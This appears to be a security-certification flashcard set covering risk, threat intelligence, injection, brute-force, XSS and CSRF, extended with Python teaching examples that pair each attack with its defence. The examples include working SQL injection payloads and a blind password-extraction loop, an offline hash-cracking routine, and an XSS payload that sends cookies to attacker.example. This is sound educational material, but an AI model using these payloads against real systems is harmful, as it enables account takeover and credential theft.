1.0 Security Concepts (Ch 1-4) Flashcards
(75 cards)
The deep web is characterized by…
Not being indexed by search engines
The dark web is characterized by…
requiring specific software and configuration to reach it (for example, the Tor network), rather than merely being unindexed
What is searchsploit?
A command-line tool that searches a local, offline copy of the Exploit Database (Exploit-DB) maintained by Offensive Security, so exploits can be found by keyword without network access
The likelihood or probability of the occurrence or realization of a threat is…
risk
The three basic elements of risk are:
assets, threats, and vulnerabilities
RMF stands for
Risk Management Framework
Knowledge about existing or emerging threats is…
threat intelligence
The five-step threat intelligence process:
Planning & Direction
Collection
Processing
Analysis and Production
Dissemination
What are STIX, TAXII, CybOX, OpenIOC, and OpenC2?
Open standards for representing and sharing threat information: STIX (a structured language for describing threats), TAXII (the transport protocol for exchanging STIX content), CybOX (a format for observables, later folded into STIX 2.x), OpenIOC (Mandiant's XML indicator-of-compromise format), and OpenC2 (a command language for automating response actions)
What is a TIP?
Threat Intelligence Platform, a way to aggregate intelligence info from multiple sources
SQL, HTML, and command are three types of…
injection vulnerabilities
What might a SQL injection attack do?
View, insert, modify, or delete database records
In-band, out-of-band, or blind/inferential are types of…
SQL injection attacks
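The three previous cards (what an injection can do, and the in-band versus blind distinction) as an added worked example that is not part of the original flashcards: a login query built by string concatenation, the same query parameterised, and a boolean-based blind loop that recovers a password one character at a time by observing only success or failure. The table, usernames and passwords are constructed for the example; SQLite is used because it needs no server.

```python
import sqlite3

# Constructed sample data for this example: an in-memory SQLite database with
# made-up users. A real target would be the application's production database.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, so user input becomes SQL syntax."""
    query = ("SELECT username, role FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchall()

def login_safe(conn, username, password):
    """Parameterised query: values travel separately from the SQL text and can
    never change its structure, whatever characters they contain."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()

def blind_extract_password(conn, username,
                           charset="abcdefghijklmnopqrstuvwxyz0123456789",
                           max_len=16):
    """Boolean-based blind (inferential) injection: nothing from the database is
    echoed back; the attacker only sees whether each probe logs in or not and
    rebuilds the password one character at a time."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            # Resulting SQL:
            #   ... WHERE username = 'alice' AND substr(password,1,1)='s'--' AND password = '...'
            # The trailing -- comments out the real password check.
            probe = f"{username}' AND substr(password,{pos},1)='{ch}'--"
            if login_vulnerable(conn, probe, "irrelevant"):
                recovered += ch
                break
        else:
            break  # no character matched at this position: end of the string
    return recovered

def demo():
    conn = build_db()
    tautology = "' OR '1'='1"
    # In-band: the tautology makes the WHERE clause true for every row, so the
    # vulnerable query returns all users; the parameterised one returns none.
    in_band = login_vulnerable(conn, "nobody", tautology)
    parameterised = login_safe(conn, "nobody", tautology)
    # Comment injection: log in as a chosen user without knowing the password.
    as_alice = login_vulnerable(conn, "alice'--", "wrong")
    # Blind: recover alice's password through yes/no answers only.
    leaked = blind_extract_password(conn, "alice")
    return in_band, parameterised, as_alice, leaked

if __name__ == "__main__":
    print(demo())
```

The fix is the parameterised form, not input filtering: `login_safe` receives exactly the same payloads and returns no rows, because the driver never lets the values become part of the statement text.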
In a command injection attack, commands will be executed with what privilege level?
The privilege level of the vulnerable application, i.e. the account the application process runs as
What happens in an online brute-force attack?
Attacker tries to log in as user by guessing their password
What happens in an offline brute-force attack?
Attacker first obtains the encrypted or hashed passwords (for example, from a stolen password database) and then guesses candidates locally, comparing each hash to the stolen ones without contacting the target system
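The online/offline distinction from the two cards above, as an added example that is not part of the original flashcards: the same short wordlist is tried against a login service that counts failures and locks the account, and then against a copy of the stored hashes where nothing counts or slows the guesses. The credential store, wordlist and lockout threshold are constructed for the example; the hash construction (salted SHA-256) is a deliberately fast one to make the point.

```python
import hashlib
import hmac
import os

# Constructed "leaked" credential store: username -> (salt, sha256(salt || password)).
# In a real offline attack the attacker holds a dump of this table.
def make_record(password, salt=None):
    salt = salt or os.urandom(8)
    digest = hashlib.sha256(salt + password.encode()).hexdigest()
    return salt, digest

LEAKED = {
    "alice": make_record("letmein"),
    "bob": make_record("correcthorse"),
    "carol": make_record("Tr0ub4dor&3!x"),  # not in the wordlist: survives both attacks
}

WORDLIST = ["password", "123456", "letmein", "qwerty", "correcthorse", "dragon"]

def offline_crack(store, wordlist):
    """Offline attack: every guess is a local hash computation. No round trip,
    no rate limit, no lockout, and no log entry on the target."""
    recovered = {}
    for user, (salt, digest) in store.items():
        for word in wordlist:
            candidate = hashlib.sha256(salt + word.encode()).hexdigest()
            if hmac.compare_digest(candidate, digest):
                recovered[user] = word
                break
    return recovered

class LoginService:
    """Minimal online target: every guess hits the service, which can count and lock."""
    def __init__(self, store, max_attempts=3):
        self.store = store
        self.max_attempts = max_attempts
        self.failures = {}

    def login(self, user, password):
        if self.failures.get(user, 0) >= self.max_attempts:
            return "locked"
        salt, digest = self.store[user]
        candidate = hashlib.sha256(salt + password.encode()).hexdigest()
        if hmac.compare_digest(candidate, digest):
            self.failures[user] = 0
            return "ok"
        self.failures[user] = self.failures.get(user, 0) + 1
        return "denied"

def online_guess(service, user, wordlist):
    """Online attack with the same wordlist. Returns the password if found before
    the account locks, otherwise None."""
    for word in wordlist:
        result = service.login(user, word)
        if result == "ok":
            return word
        if result == "locked":
            return None
    return None

if __name__ == "__main__":
    svc = LoginService(LEAKED, max_attempts=3)
    print("online alice:", online_guess(svc, "alice", WORDLIST))   # found on the 3rd guess
    print("online bob:", online_guess(svc, "bob", WORDLIST))       # locked out first
    print("offline:", offline_crack(LEAKED, WORDLIST))             # alice and bob both fall
```

Because the offline attacker is limited only by their own hardware, the defence moves to the hash itself: a slow, memory-hard password hash (bcrypt, scrypt or Argon2 rather than a bare SHA-256) is what makes each offline guess expensive, while lockouts and rate limits only help against the online case.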
Predicting session tokens, session sniffing, man-in-the-middle (MITM), and man-in-the-browser (MITB) are four techniques by which an attacker can carry out…
session hijacking
XSS stands for
Cross-Site Scripting
Exposing a back-end object reference (such as a database key or file name) as a URL parameter, without checking that the user may access that object, is what kind of vulnerability?
Insecure Direct Object Reference (IDOR)
Three categories of XSS:
Reflected (nonpersistent)
Stored (persistent)
DOM-based
Getting a user to click on a malicious link, so that the payload in the request is echoed back in the server's response, is what type of XSS attack?
Reflected (non-persistent)
If the malicious script has been saved on the vulnerable server (for example, in a comment or profile field) and is served to every user who later requests that content, what type of XSS attack is this?
Stored (persistent)
What do you call a language-independent, cross-platform API that treats HTML/XHTML/XML documents as a tree structure?
DOM (Document Object Model)
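The reflected and stored categories from the cards above, as an added example that is not part of the original flashcards: a tiny stand-in for a web framework's template layer renders a search page (reflected: the query parameter is echoed back) and a comment list (stored: the payload is saved and served to later visitors), first unescaped and then with `html.escape`. It also shows the caveat that escaping must fit the context: `html.escape(s, quote=False)` is enough between tags but not inside an attribute value. The payloads and comment store are constructed for the example; DOM-based XSS happens in client-side script and is not shown here.

```python
import html

# Constructed payloads. The first one exfiltrates the session cookie if it runs;
# the second breaks out of a quoted attribute to add an event handler.
SCRIPT_PAYLOAD = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"
ATTR_PAYLOAD = '" onfocus="alert(document.cookie)" autofocus="'

def escape_text_only(s):
    """Escapes < > & but leaves quotes alone: safe only for text between tags."""
    return html.escape(s, quote=False)

def escape_attr(s):
    """Escapes quotes as well: required for a value inside an HTML attribute."""
    return html.escape(s, quote=True)

# Reflected: the request parameter is echoed straight into the response.
def render_search(query, escaper=None):
    shown = query if escaper is None else escaper(query)
    return f"<p>Results for: {shown}</p>"

# Stored: comments live on the server and are rendered for every later visitor.
class CommentStore:
    def __init__(self):
        self.comments = []  # constructed stand-in for a database table

    def post(self, text):
        self.comments.append(text)

    def render(self, escaper=None):
        items = []
        for c in self.comments:
            items.append(f"<li>{c if escaper is None else escaper(c)}</li>")
        return "<ul>" + "".join(items) + "</ul>"

# Attribute context: the same escaper that protects <p> text is not enough here.
def render_search_box(prefill, escaper):
    return f'<input name="q" value="{escaper(prefill)}">'

def demo():
    store = CommentStore()
    store.post("nice post")
    store.post(SCRIPT_PAYLOAD)  # attacker posts once; every reader is then hit
    return {
        "reflected_unsafe": render_search(SCRIPT_PAYLOAD),
        "reflected_safe": render_search(SCRIPT_PAYLOAD, escape_text_only),
        "stored_unsafe": store.render(),
        "stored_safe": store.render(escape_text_only),
        "attr_wrong_escaper": render_search_box(ATTR_PAYLOAD, escape_text_only),
        "attr_right_escaper": render_search_box(ATTR_PAYLOAD, escape_attr),
    }

if __name__ == "__main__":
    for name, page in demo().items():
        print(f"{name}: {page}")
```

The difference between the two categories is not in the rendering code, which is identical, but in where the payload comes from: the reflected case needs a victim to open a crafted link, while the stored case is delivered to everyone who views the page.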
What is a CSRF (or XSRF) attack?
Cross-Site Request Forgery: an attacker causes the browser of a user the application trusts to send unauthorized requests to that application; the browser attaches the user's session cookie automatically, so the request looks legitimate to the server.
aka one-click attacks or session riding
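The CSRF card above, as an added example that is not part of the original flashcards: a money-transfer handler that first relies only on the session cookie (the browser sends it with a forged request as well), then is protected with a synchronizer token bound to the session via an HMAC. The session table, request shapes and server key are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constructed per-deployment secret; in practice loaded from configuration.
SERVER_KEY = secrets.token_bytes(32)

def issue_csrf_token(session_id):
    """Synchronizer token embedded in the page rendered for this session:
    nonce.HMAC(server_key, session_id:nonce). An attacker's page on another
    origin cannot read it, because the same-origin policy blocks reading the
    victim's page contents."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"

def verify_csrf_token(session_id, token):
    """Recomputes the MAC for this session; a token issued for any other session
    (including the attacker's own) fails the check."""
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)

def handle_transfer(request, sessions, require_token=True):
    """request is a dict with 'cookies' and 'form'. The cookie is attached by the
    browser on every request to this site, which is exactly what CSRF rides on."""
    sid = request.get("cookies", {}).get("session")
    if sid not in sessions:
        return 401, "not logged in"
    form = request.get("form", {})
    if require_token and not verify_csrf_token(sid, form.get("csrf_token")):
        return 403, "csrf check failed"
    return 200, f"{sessions[sid]} sent {form['amount']} to {form['to']}"

def demo():
    sessions = {"sess-alice": "alice", "sess-mallory": "mallory"}
    # Legitimate submission: alice's page was rendered with a token for her session.
    good = {"cookies": {"session": "sess-alice"},
            "form": {"to": "bob", "amount": "10", "csrf_token": issue_csrf_token("sess-alice")}}
    # Forged: an auto-submitting form on attacker.example. The browser still adds
    # alice's cookie, but the attacker could not obtain a token for her session.
    forged = {"cookies": {"session": "sess-alice"},
              "form": {"to": "mallory", "amount": "1000"}}
    # Replayed: the attacker uses a token from their own account against alice's session.
    replayed = {"cookies": {"session": "sess-alice"},
                "form": {"to": "mallory", "amount": "1000",
                         "csrf_token": issue_csrf_token("sess-mallory")}}
    return {
        "forged_without_token_check": handle_transfer(forged, sessions, require_token=False),
        "good": handle_transfer(good, sessions),
        "forged": handle_transfer(forged, sessions),
        "replayed": handle_transfer(replayed, sessions),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The first result shows why the session cookie alone is not proof of intent: without the token check the forged request succeeds as alice. Modern browsers add a second layer with the cookie `SameSite` attribute, but the token is what makes the server's decision independent of client behaviour.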